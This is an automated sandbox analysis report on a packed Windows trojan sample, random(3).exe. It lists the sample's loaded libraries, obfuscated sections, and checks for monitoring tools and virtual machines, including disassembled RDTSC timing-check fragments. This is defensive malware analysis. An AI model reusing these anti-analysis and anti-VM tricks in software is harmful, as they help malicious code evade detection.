      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00828F820_2_00828F82
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00877F850_2_00877F85
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00828F930_2_00828F93
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0083DF900_2_0083DF90
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008A4F960_2_008A4F96
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0080BFAA0_2_0080BFAA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0086CFCB0_2_0086CFCB
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008A0FD10_2_008A0FD1
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00899F080_2_00899F08
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0087FF0B0_2_0087FF0B
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0085FF150_2_0085FF15
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0080DF2A0_2_0080DF2A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00863F320_2_00863F32
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00868F3A0_2_00868F3A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00888F350_2_00888F35
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00828F440_2_00828F44
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00891F590_2_00891F59
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009CBF760_2_009CBF76
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0088CF760_2_0088CF76
      Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 007FB210 appears 48 times
      Source: C:\Users\user\Desktop\random(3).exeCode function: String function: 0080B0F0 appears 116 times
      Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: random(3).exeStatic PE information: Section: ZLIB complexity 0.9981049408783784
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0082A3E0 CoCreateInstance,0_2_0082A3E0
      Source: C:\Users\user\Desktop\random(3).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: random(3).exeReversingLabs: Detection: 52%
      Source: random(3).exeVirustotal: Detection: 58%
      Source: random(3).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Users\user\Desktop\random(3).exeJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: random(3).exeStatic file information: File size 3042304 > 1048576
      Source: random(3).exeStatic PE information: Raw size of bxbbqwne is bigger than: 0x100000 < 0x2b4e00

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\random(3).exeUnpacked PE file: 0.2.random(3).exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W;bxbbqwne:EW;wovautmq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bxbbqwne:EW;wovautmq:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: random(3).exeStatic PE information: real checksum: 0x2f1f11 should be: 0x2f1158
      Source: random(3).exeStatic PE information: section name:
      Source: random(3).exeStatic PE information: section name: .idata
      Source: random(3).exeStatic PE information: section name: bxbbqwne
      Source: random(3).exeStatic PE information: section name: wovautmq
      Source: random(3).exeStatic PE information: section name: .taggant
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008575AE push edi; mov dword ptr [esp], eax0_2_00857B98
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_00AAA0A0 push eax; mov dword ptr [esp], esi0_2_00AAA0B1
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0085C091 push edx; mov dword ptr [esp], 483B66E8h0_2_0085D9EF
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008560AE push 745BBD38h; mov dword ptr [esp], ecx0_2_008560B7
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 30F0E3ADh; mov dword ptr [esp], eax0_2_009C20D8
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 1BBC6E7Dh; mov dword ptr [esp], edx0_2_009C20FA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 44AD6259h; mov dword ptr [esp], edi0_2_009C210E
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push esi; mov dword ptr [esp], ebx0_2_009C21A2
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 027AF926h; mov dword ptr [esp], eax0_2_009C21E6
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push esi; mov dword ptr [esp], eax0_2_009C21EA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 0093E600h; mov dword ptr [esp], ecx0_2_009C223E
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 7733C935h; mov dword ptr [esp], edi0_2_009C226F
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push ecx; mov dword ptr [esp], edi0_2_009C227E
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edx; mov dword ptr [esp], 2F2C2AAEh0_2_009C22AF
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edi; mov dword ptr [esp], ecx0_2_009C2443
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edi; mov dword ptr [esp], 48CDAF73h0_2_009C2483
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edx; mov dword ptr [esp], 778E7434h0_2_009C24BD
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 2F5BF09Ch; mov dword ptr [esp], edx0_2_009C24FB
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edx; mov dword ptr [esp], ebx0_2_009C251D
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push ebp; mov dword ptr [esp], esi0_2_009C252B
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push ebx; mov dword ptr [esp], 7E75B86Eh0_2_009C2554
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push ecx; mov dword ptr [esp], esp0_2_009C2576
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 1E899422h; mov dword ptr [esp], ebp0_2_009C25A5
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push eax; mov dword ptr [esp], ebx0_2_009C26B8
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push edx; mov dword ptr [esp], ecx0_2_009C26BF
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 55813061h; mov dword ptr [esp], ecx0_2_009C2729
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push eax; mov dword ptr [esp], 17EB43EBh0_2_009C272D
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 51560016h; mov dword ptr [esp], edx0_2_009C2763
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push ebx; mov dword ptr [esp], 7EB707EAh0_2_009C27CD
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push 35F07D4Bh; mov dword ptr [esp], ecx0_2_009C282D
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_009C20A7 push eax; mov dword ptr [esp], 193B65ABh0_2_009C2842
      Source: random(3).exeStatic PE information: section name: entropy: 7.980403044384576

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonclassJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\random(3).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\Desktop\random(3).exeSystem information queried: FirmwareTableInformationJump to behavior
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\random(3).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 8572A7 second address: 8572AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 8572AB second address: 8572B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 8572B1 second address: 8572B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 8572B7 second address: 8572BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 8572BB second address: 856B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F998484EB0Dh 0x00000010 push dword ptr [ebp+122D175Dh] 0x00000016 jmp 00007F998484EB10h 0x0000001b mov dword ptr [ebp+122D2EF9h], eax 0x00000021 call dword ptr [ebp+122D1C31h] 0x00000027 pushad 0x00000028 jmp 00007F998484EB0Eh 0x0000002d xor eax, eax 0x0000002f jg 00007F998484EB14h 0x00000035 jmp 00007F998484EB0Eh 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e pushad 0x0000003f clc 0x00000040 mov bl, A9h 0x00000042 popad 0x00000043 mov dword ptr [ebp+122D2C64h], eax 0x00000049 sub dword ptr [ebp+122D3124h], ebx 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D3124h], esi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007F998484EB19h 0x00000063 je 00007F998484EB11h 0x00000069 jmp 00007F998484EB0Bh 0x0000006e lodsw 0x00000070 jmp 00007F998484EB13h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 mov dword ptr [ebp+122D2EEFh], eax 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 xor dword ptr [ebp+122D3124h], edx 0x00000089 nop 0x0000008a push edx 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e pop eax 0x0000008f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D57B8 second address: 9D57E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F9984B08D0Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F9984B08D17h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D613D second address: 9D6170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB15h 0x00000007 jmp 00007F998484EB10h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 je 00007F998484EB06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D6170 second address: 9D61CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F9984B08D14h 0x0000000b pushad 0x0000000c jmp 00007F9984B08D11h 0x00000011 jmp 00007F9984B08D15h 0x00000016 jmp 00007F9984B08D13h 0x0000001b ja 00007F9984B08D06h 0x00000021 popad 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D61CD second address: 9D61D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D81F7 second address: 856B17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F9984B08D06h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 327834FDh 0x00000013 mov edi, dword ptr [ebp+122D2CECh] 0x00000019 mov dword ptr [ebp+122D1D54h], ebx 0x0000001f push dword ptr [ebp+122D175Dh] 0x00000025 add esi, dword ptr [ebp+122D294Ah] 0x0000002b call dword ptr [ebp+122D1C31h] 0x00000031 pushad 0x00000032 jmp 00007F9984B08D0Eh 0x00000037 xor eax, eax 0x00000039 jg 00007F9984B08D14h 0x0000003f jmp 00007F9984B08D0Eh 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 pushad 0x00000049 clc 0x0000004a mov bl, A9h 0x0000004c popad 0x0000004d mov dword ptr [ebp+122D2C64h], eax 0x00000053 sub dword ptr [ebp+122D3124h], ebx 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D3124h], esi 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jmp 00007F9984B08D19h 0x0000006d je 00007F9984B08D11h 0x00000073 jmp 00007F9984B08D0Bh 0x00000078 lodsw 0x0000007a jmp 00007F9984B08D13h 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D2EEFh], eax 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d xor dword ptr [ebp+122D3124h], edx 0x00000093 nop 0x00000094 push edx 0x00000095 push eax 0x00000096 push edx 0x00000097 push eax 0x00000098 pop eax 0x00000099 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D8299 second address: 9D82A3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D82A3 second address: 9D82D4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9984B08D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9984B08D16h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D8463 second address: 9D84B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F998484EB06h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 0AF173ABh 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F998484EB08h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d movzx edx, dx 0x00000030 push 00000003h 0x00000032 sub ch, FFFFFFBDh 0x00000035 push 00000000h 0x00000037 mov ecx, 0B97845Ch 0x0000003c push 00000003h 0x0000003e push 9079CAB3h 0x00000043 push ebx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D84B3 second address: 9D84B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D858C second address: 9D85B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F998484EB0Ah 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D2E61h], edx 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 mov dword ptr [ebp+122D1D77h], esi 0x0000001d pop edi 0x0000001e push 0826DF80h 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9EB121 second address: 9EB125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9EB125 second address: 9EB129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9C27 second address: 9F9C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9C2B second address: 9F9C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F998484EB0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9C3B second address: 9F9C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9984B08D13h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9C56 second address: 9F9C92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F998484EB19h 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F998484EB12h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F7A0B second address: 9F7A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9984B08D06h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F7B5D second address: 9F7B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F998484EB06h 0x0000000a jmp 00007F998484EB0Ch 0x0000000f jmp 00007F998484EB14h 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F7B8D second address: 9F7BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D13h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F7BA6 second address: 9F7BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F7EAC second address: 9F7EB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9984B08D06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F816A second address: 9F8176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F998484EB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F8176 second address: 9F817A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F817A second address: 9F817E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F85CA second address: 9F85CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F85CE second address: 9F85F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jbe 00007F998484EB06h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F85F5 second address: 9F85FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9984B08D06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F85FF second address: 9F8617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F998484EB06h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F8A95 second address: 9F8A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F8C2B second address: 9F8C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB15h 0x00000009 jnl 00007F998484EB06h 0x0000000f jnc 00007F998484EB06h 0x00000015 popad 0x00000016 pushad 0x00000017 jbe 00007F998484EB0Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f jo 00007F998484EB06h 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F8C64 second address: 9F8C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F8C70 second address: 9F8C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9370 second address: 9F9374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F9374 second address: 9F938B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F998484EB0Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F938B second address: 9F938F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F94FE second address: 9F9504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9F06F1 second address: 9F070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D15h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9FF087 second address: 9FF08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
